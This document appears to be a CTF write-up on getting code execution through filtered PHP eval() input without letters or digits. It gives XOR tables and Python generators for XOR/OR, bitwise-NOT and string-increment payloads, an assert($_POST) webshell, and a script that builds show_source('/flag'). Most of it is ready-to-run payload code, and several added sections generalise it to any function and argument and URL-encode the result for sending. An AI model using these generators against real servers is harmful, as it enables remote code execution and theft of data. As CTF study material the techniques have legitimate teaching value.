chr(45) ^ chr(64) = m
chr(45) ^ chr(91) = v
chr(45) ^ chr(92) = q
chr(45) ^ chr(93) = p
chr(45) ^ chr(94) = s
chr(45) ^ chr(95) = r
chr(45) ^ chr(96) = M
chr(45) ^ chr(123) = V
chr(45) ^ chr(124) = Q
chr(45) ^ chr(125) = P
chr(45) ^ chr(126) = S
chr(45) ^ chr(127) = R
chr(46) ^ chr(64) = n
chr(46) ^ chr(91) = u
chr(46) ^ chr(92) = r
chr(46) ^ chr(93) = s
chr(46) ^ chr(94) = p
chr(46) ^ chr(95) = q
chr(46) ^ chr(96) = N
chr(46) ^ chr(123) = U
chr(46) ^ chr(124) = R
chr(46) ^ chr(125) = S
chr(46) ^ chr(126) = P
chr(46) ^ chr(127) = Q
chr(47) ^ chr(64) = o
chr(47) ^ chr(91) = t
chr(47) ^ chr(92) = s
chr(47) ^ chr(93) = r
chr(47) ^ chr(94) = q
chr(47) ^ chr(95) = p
chr(47) ^ chr(96) = O
chr(47) ^ chr(123) = T
chr(47) ^ chr(124) = S
chr(47) ^ chr(125) = R
chr(47) ^ chr(126) = Q
chr(47) ^ chr(127) = P
chr(58) ^ chr(64) = z
chr(58) ^ chr(91) = a
chr(58) ^ chr(92) = f
chr(58) ^ chr(93) = g
chr(58) ^ chr(94) = d
chr(58) ^ chr(95) = e
chr(58) ^ chr(96) = Z
chr(58) ^ chr(123) = A
chr(58) ^ chr(124) = F
chr(58) ^ chr(125) = G
chr(58) ^ chr(126) = D
chr(58) ^ chr(127) = E
chr(59) ^ chr(92) = g
chr(59) ^ chr(93) = f
chr(59) ^ chr(94) = e
chr(59) ^ chr(95) = d
chr(59) ^ chr(124) = G
chr(59) ^ chr(125) = F
chr(59) ^ chr(126) = E
chr(59) ^ chr(127) = D
chr(60) ^ chr(91) = g
chr(60) ^ chr(93) = a
chr(60) ^ chr(94) = b
chr(60) ^ chr(95) = c
chr(60) ^ chr(123) = G
chr(60) ^ chr(125) = A
chr(60) ^ chr(126) = B
chr(60) ^ chr(127) = C
chr(61) ^ chr(91) = f
chr(61) ^ chr(92) = a
chr(61) ^ chr(94) = c
chr(61) ^ chr(95) = b
chr(61) ^ chr(123) = F
chr(61) ^ chr(124) = A
chr(61) ^ chr(126) = C
chr(61) ^ chr(127) = B
chr(62) ^ chr(91) = e
chr(62) ^ chr(92) = b
chr(62) ^ chr(93) = c
chr(62) ^ chr(95) = a
chr(62) ^ chr(123) = E
chr(62) ^ chr(124) = B
chr(62) ^ chr(125) = C
chr(62) ^ chr(127) = A
chr(63) ^ chr(91) = d
chr(63) ^ chr(92) = c
chr(63) ^ chr(93) = b
chr(63) ^ chr(94) = a
chr(63) ^ chr(123) = D
chr(63) ^ chr(124) = C
chr(63) ^ chr(125) = B
chr(63) ^ chr(126) = A
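The table above is one fixed operand pair per character. The following added example (my code, not from the original post) generalises it: given a target string and the challenge's filter regex, it searches for operand pairs that XOR or OR to the target and whose bytes all survive the filter, reports what PHP will compute for them, and emits the ("…"^"…")("…"^"…"); call form, which PHP 7 and later accept and which needs neither $ nor _. The filter regexes and the commands below are assumptions for illustration.

```python
import re
from urllib.parse import quote

OPS = {'^': lambda a, b: a ^ b, '|': lambda a, b: a | b}
# Bytes that would break a PHP double-quoted literal: " ends it, \ escapes, $ interpolates.
NEVER = {0x22, 0x5C, 0x24}


def survives(s, forbidden=r'[a-z0-9]'):
    """True if no byte of s matches the filter regex (case-insensitive, like the challenge's /i)."""
    return re.search(forbidden, s, re.IGNORECASE | re.ASCII) is None


def find_pair(target, op='^', forbidden=r'[a-z0-9]', candidates=range(1, 128)):
    """Return (left, right) with left <op> right == target byte by byte, where every byte of
    both operands survives the filter. Default candidates are 0x01-0x7F, the range the table
    above was built from; pass range(1, 256) to allow high bytes as well.
    Raises ValueError if some target byte cannot be produced under the filter."""
    ok = [b for b in candidates if b not in NEVER and survives(chr(b), forbidden)]
    left, right = bytearray(), bytearray()
    for t in target.encode('latin-1'):
        for a in ok:
            b = next((c for c in ok if OPS[op](a, c) == t), None)
            if b is not None:
                left.append(a)
                right.append(b)
                break
        else:
            raise ValueError(f'no {op} pair for byte {t:#04x} under filter {forbidden!r}')
    return left.decode('latin-1'), right.decode('latin-1')


def php_bitop(left, right, op):
    """What PHP computes for "left" <op> "right": byte-wise over the common length."""
    return ''.join(chr(OPS[op](ord(a), ord(b))) for a, b in zip(left, right))


def php_call(func, arg, op='^', **kw):
    """Emit ("L"^"R")("L"^"R"); PHP 7+ calls the first string as a function name.
    Neither $ nor _ appears, so this form also fits filters that ban them."""
    fl, fr = find_pair(func, op, **kw)
    al, ar = find_pair(arg, op, **kw)
    return f'("{fl}"{op}"{fr}")("{al}"{op}"{ar}");'


def url_param(name, payload):
    """Percent-encode every byte as latin-1 (not UTF-8) so control and high bytes reach PHP,
    which decodes the query string before eval() ever sees the code."""
    return f'{name}=' + quote(payload.encode('latin-1'), safe='')


if __name__ == '__main__':
    l, r = find_pair('system')
    print(repr(l), repr(r), php_bitop(l, r, '^'))
    payload = php_call('system', 'cat /flag')
    print(repr(payload))
    print(url_param('shell', payload))
```

Two details matter in practice. The operand bytes are chosen from the set that survives the filter, not from a fixed table, so the same function works for a filter that also bans _ and $ (variant B above) as long as some pair still exists; and the query string must carry the raw bytes percent-encoded exactly once, since PHP decodes %XX before the code is evaluated.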

NOT script

PHP can apply ~ to a Chinese character; the result is garbage, but because every UTF-8 continuation byte lies in 0x80-0xBF, its negation lies in 0x40-0x7F, which is exactly the range of @, A-Z, _, `, a-z and a few symbols. For example ~"瞰" is "\x18aO": byte 1 negated is a and byte 2 negated is O. The payload below picks such bytes out of different characters to spell assert and _POST:

<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
// assert($_POST[2]); the $str{N} offset syntax is deprecated in PHP 7.4 and removed in 8.0, use $str[N] there

The payload above is P神's; since negating Chinese characters is a PHP trait, a Python implementation is more involved, so I'll come back and fill this hole with a PHP version later.
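As an added example (my code, not the post's), the search that the paragraph above leaves open: for every character of a target name, find a CJK character whose negated UTF-8 byte equals it, verify the result by applying the same ~ in Python, and emit a payload in the same shape as P神's. The function and variable names are parameters, not from the page; [] offsets are used instead of {} so the output also runs on PHP 8.

```python
def cjk_byte_sources():
    """Map continuation-byte value -> (character, byte index) over the CJK Unified Ideographs
    block U+4E00..U+9FFF. Every character there is 3 bytes in UTF-8 (E4-E9 followed by two
    bytes in 0x80-0xBF), so ~byte lands in 0x40-0x7F: @, A-Z, [, \\, ], ^, _, `, a-z, {, |, }, ~."""
    table = {}
    for cp in range(0x4E00, 0xA000):
        enc = chr(cp).encode('utf-8')
        for idx in (1, 2):
            table.setdefault(enc[idx], (chr(cp), idx))
    return table


def lookup(target):
    """For each character of target, pick (character, index) such that ~bytes[index] equals it.
    Only characters in 0x40-0x7F are reachable this way; a space, for instance, is not."""
    src = cjk_byte_sources()
    picks = []
    for c in target:
        needed = (~ord(c)) & 0xFF
        if needed not in src:
            raise ValueError(f'{c!r} is not the negation of any UTF-8 continuation byte')
        picks.append(src[needed])
    return picks


def simulate(picks):
    """Apply PHP's semantics in Python: byte idx of the character's UTF-8 form, bitwise NOT."""
    return ''.join(chr((~ch.encode('utf-8')[idx]) & 0xFF) for ch, idx in picks)


def not_payload(func='assert', var='_POST', offset='[]'):
    """Same shape as P神's payload: $_ = 1 and $__ = 2 from comparisons, then one
    $___="字";$____.=~($___[N]); step per character of the function and variable names.
    offset='{}' reproduces the original syntax, which PHP 8 no longer accepts."""
    o, c = offset[0], offset[1]
    index = {1: '$_', 2: '$__'}
    lines = ["$__=('>'>'<')+('>'>'<');", '$_=$__/$__;', "$____='';"]
    lines += [f'$___="{ch}";$____.=~($___{o}{index[idx]}{c});' for ch, idx in lookup(func)]
    lines.append("$_____='';")
    lines += [f'$___="{ch}";$_____.=~($___{o}{index[idx]}{c});' for ch, idx in lookup(var)]
    lines.append('$_=$$_____;')
    lines.append('$____($_[$__]);')   # func($_POST[2])
    return '\n'.join(lines)


if __name__ == '__main__':
    print(simulate(lookup('assert')), simulate(lookup('_POST')))
    print(not_payload())
```

simulate() is the check to run before sending anything: it reproduces PHP's byte-wise ~ on the chosen characters, so a wrong index or a character that the transport re-encoded shows up as a misspelt function name locally rather than as a silent failure on the target. The payload stays valid UTF-8, which is the practical advantage of this form over sending negated raw bytes.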

PHP quirks

PHP's increment on a string variable does not operate on ASCII codes; it does this: $_='Z'; $_++; and now $_ is 'AA'. It only affects alphanumeric characters (the walk starts from the right and stops at the first non-alphanumeric one) and only for ++; -- leaves such a string unchanged.

So with this quirk, once we obtain a or A we can reach every letter by incrementing. In PHP, concatenating an array with a string converts the array to the string 'Array' (with a notice); taking the first character of that string gives 'A'.

Because PHP function names are case-insensitive, what we finally execute is ASSERT($_POST[_]), with no need for a lowercase a. Two version caveats: assert() stopped evaluating string arguments in PHP 8.0 (deprecated since 7.2), and the bare constant _ used as the array key is a fatal error in PHP 8, so on PHP 8 targets quote the key and pick a different callable:

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]); the bare constant _ is treated as the string '_' (with a notice) only before PHP 8.0
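An added example (my code, not the post's) that models PHP's string increment in Python, which is the rule the hand-written ++ chains above rely on, and uses it to emit the same construction for an arbitrary function and variable name. The names are parameters and the quoted key is an assumption chosen for PHP 8 compatibility.

```python
def php_increment(s: str) -> str:
    """Model of PHP's ++ on a non-numeric string (zend increment_string): walk from the right;
    a-z, A-Z and 0-9 each wrap within their own class and carry to the left; the first
    non-alphanumeric character stops the walk; if the carry runs off the left end, a new
    leading character of the same class is prepended. Numeric strings ('9'++ -> 10) are
    outside this model."""
    if s == '':
        return '1'
    chars = list(s)
    pos = len(chars) - 1
    carry = ''
    while pos >= 0:
        ch = chars[pos]
        if 'a' <= ch <= 'z':
            chars[pos], carry = ('a', 'a') if ch == 'z' else (chr(ord(ch) + 1), '')
        elif 'A' <= ch <= 'Z':
            chars[pos], carry = ('A', 'A') if ch == 'Z' else (chr(ord(ch) + 1), '')
        elif '0' <= ch <= '9':
            chars[pos], carry = ('0', '1') if ch == '9' else (chr(ord(ch) + 1), '')
        else:
            carry = ''
            break
        if not carry:
            break
        pos -= 1
    return carry + ''.join(chars)


def steps_from(start: str, target: str, limit: int = 200) -> int:
    """How many ++ applications take start to target ('A' -> 'S' is 18)."""
    s, n = start, 0
    while s != target:
        s, n = php_increment(s), n + 1
        if n > limit:
            raise ValueError(f'{target!r} is not reachable from {start!r} in {limit} steps')
    return n


def increment_payload(func: str = 'ASSERT', var: str = '_POST', key: str = '_') -> str:
    """Emit the page's construction for arbitrary names: $_ = 'Array'[0] = 'A', then for every
    letter copy 'A' into $__, apply ++ the right number of times and append. Letters are
    uppercased: fine for function names (case-insensitive) and for $_POST/$_GET, not for a
    lowercase variable name. The key is quoted because a bare _ constant is an error in PHP 8."""
    lines = ['$_=[];', '$_=@"$_";', "$_=$_['!'=='@'];"]  # "Array", then index false == 0
    def spell(dest, name):
        out = [f"{dest}='';"]
        for c in name:
            if c == '_':
                out.append(f"{dest}.='_';")
            else:
                out.append('$__=$_;' + '$__++;' * steps_from('A', c.upper()) + f'{dest}.=$__;')
        return out
    lines += spell('$___', func) + spell('$____', var)
    lines.append('$_=$$____;')              # $_ = $_POST
    lines.append(f"$___($_['{key}']);")     # ASSERT($_POST['_'])
    return '\n'.join(lines)


if __name__ == '__main__':
    print(php_increment('Z'), php_increment('Az'), php_increment('a9'), steps_from('A', 'S'))
    print(increment_payload())
```

The model is what makes the counts in the PHP above checkable: steps_from('A', 'S') must be 18 and steps_from('A', 'T') 19, and an off-by-one there produces a valid-looking but wrong function name. It also shows why the technique starts from a single letter rather than a longer string: 'Z'++ becomes 'AA', so incrementing past the end of the alphabet changes the length.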

Advanced

Letters, digits and most symbols filtered

This time almost every usable character is banned (OR is still available), but y1ng wrote a general-purpose script built on the increment method above, which applies far more widely. Note how it obtains its first 'A' without any letter or digit: 1/0 and 0/0 give INF and NAN, (NAN.INF) is the string "NANINF", and offset 1 of that is 'A'. This relies on PHP 7, where / by zero only emits a warning; PHP 8 throws DivisionByZeroError and has removed the {} string-offset syntax the script uses.

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
from urllib.parse import quote_plus

def g(payload, buff):
    offset = 3 + buff
    res = ""
    base = 65
    for i in range(len(payload)):
        if payload[i] == '_' or payload[i] == '/':
            continue
        _ascii = ord(payload[i])
        #init
        underline =  "$" + ("_" * (i + offset))
        undefined = "$" + ("_" * (len(payload) + offset + 15))
        var = f"++{underline};$__-={underline};$__++;{underline}/=$__;{underline}=(({undefined}/{undefined}).{underline})"+r"{++$__};$__--;"
        res += var
        tmp = ''
        if _ascii > base:
            for i in range(_ascii-base):
                tmp = tmp + f"++{underline};"
        res += tmp

    first =  "$" + ("_" * offset)
    for i in range(1, len(payload)):
        if payload[i] == '_':
            res += f"{first}.='_';"
            continue
        if payload[i] == '/':
            res += f"{first}.='/';"
            continue
        final_var = "$" + ("_" * (i + offset))
        res += f"{first}.={final_var};"
    return [res, "$" + "_" * (offset)]

pre = "'');"
after = '//'

buff = len('STRTOLOWERSHOW_SOURCE')
flag = g("/FLAG", buff)

buff = len('STRTOLOWER')
showsource = g("SHOW_SOURCE", buff)

buff = 0
strtolower = g('STRTOLOWER', buff)

final = ''

#1. Build STRTOLOWER and store it in variable a
final += strtolower[0]
a = strtolower[1] # a = '$___' # STRTOLOWER

#2. Build SHOW_SOURCE and store it in variable b
final += showsource[0]
b = showsource[1] # b = '$_____________' #SHOW_SOURCE

#3. Build /FLAG and store it in variable c
final += flag[0] + flag[1] + "='/'." + flag[1] + ';'
c = flag[1] # c = '$________________________' #/FLAG

# Declare the a, b and c variables
padding = f'$______________________________________________={a};$_______________________________________________={b};$________________________________________________={c};'
final += padding

# 4. Variable d = a(c), so d is /flag
d = "$______________________________________________($________________________________________________);"
padding = '$_________________________________________________='+d
final += padding

#5. b(d) is SHOW_SOURCE('/flag')
final += '$_______________________________________________($_________________________________________________);'

final = pre + final
final = final + after

print(final.replace('+', '%2b'))


Last modified: 2020-08-28 09:17 PM